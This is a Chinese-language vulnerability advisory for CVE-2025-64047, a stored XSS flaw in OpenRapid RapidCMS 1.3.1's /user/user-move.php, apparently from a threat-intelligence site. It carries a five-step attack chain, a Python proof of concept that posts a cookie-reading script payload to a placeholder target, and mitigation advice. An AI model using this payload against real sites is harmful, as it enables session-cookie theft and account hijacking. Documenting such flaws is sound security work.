CVE-2025-64047 CVSS 6.1 中危

CVE-2025-64047 OpenRapid RapidCMS 1.3.1 跨站脚本(XSS)漏洞

披露日期: 2025-11-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-64047

漏洞类型

跨站脚本(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

OpenRapid RapidCMS

漏洞概述

CVE-2025-64047是OpenRapid RapidCMS 1.3.1版本中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于/user/user-move.php文件中，由于应用程序对用户输入的验证和过滤不足，攻击者可以在用户移动操作中注入恶意JavaScript代码。当其他用户访问包含恶意脚本的页面时，这些脚本将在其浏览器上下文中执行，从而窃取会话Cookie、劫持用户账户或进行其他恶意操作。由于该漏洞不需要认证即可利用，且攻击复杂度较低，因此具有较高的实际威胁性。攻击者可以利用此漏洞对CMS管理员或其他用户发起进一步攻击，获取敏感信息或提升权限。

技术细节

该漏洞是由于/user/user-move.php文件对用户输入参数缺乏充分的输入验证和输出编码导致的。攻击者可以通过构造特制的HTTP请求，在用户移动操作的参数中注入恶意JavaScript代码(如<script>alert(document.cookie)</script>)。由于该输入被存储在数据库中且在后续页面访问时被未经适当转义地输出到HTML页面中，恶意脚本将在受害者的浏览器中执行。CVSS 3.1向量显示该漏洞的网络可利用性(AV:N)、低攻击复杂度(AC:L)、不需要权限(PR:N)，但需要用户交互(UI:R)。攻击者可以利用此漏洞窃取用户会话令牌、执行任意操作或重定向用户到恶意网站。建议开发者对所有用户输入进行严格的输入验证，并使用适当的输出编码技术(如HTML转义)来防止XSS攻击。

攻击链分析

STEP 1

步骤1

攻击者访问OpenRapid RapidCMS 1.3.1的/user/user-move.php页面

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的HTTP请求，在用户移动参数中注入XSS payload

STEP 3

步骤3

恶意脚本被存储在数据库中，未经过滤或转义

STEP 4

步骤4

当其他用户访问受影响的页面时，恶意脚本在其浏览器中执行

STEP 5

步骤5

攻击者通过XSS窃取用户会话Cookie、劫持账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-64047 XSS PoC for OpenRapid RapidCMS 1.3.1
# Vulnerability: Stored XSS in /user/user-move.php

target_url = "http://target.com/user/user-move.php"

# Malicious XSS payload
xss_payload = "<script>alert(document.cookie)</script>"

# Construct the exploit request
# The vulnerability occurs when user input is not properly sanitized
data = {
    "user_id": "1",
    "destination": xss_payload,
    "action": "move"
}

try:
    response = requests.post(target_url, data=data, timeout=10)
    print(f"[*] Request sent to {target_url}")
    print(f"[*] Payload: {xss_payload}")
    print(f"[*] Status Code: {response.status_code}")
    
    if response.status_code == 200:
        print("[+] PoC executed - XSS payload injected")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

OpenRapid RapidCMS 1.3.1

防御指南

临时缓解措施

在修复补丁发布之前，可通过以下措施临时缓解：1)在前端和后端同时对用户输入进行严格过滤，禁止<script>等危险标签；2)部署Web应用防火墙(WAF)规则拦截恶意XSS请求；3)限制/user/user-move.php等敏感功能的访问权限；4)监控日志中的异常请求模式；5)提醒用户不要点击来源不明的链接以降低被攻击风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-64047
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-64047
3 Details https://www.cvedetails.com/cve/CVE-2025-64047/
4 VulDB https://vuldb.com/cve/CVE-2025-64047
5 Link http://rapidcms.com
6 Link https://gist.github.com/b1uel0n3/b105ad05dbcd3fe148a26e8180dddda7

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表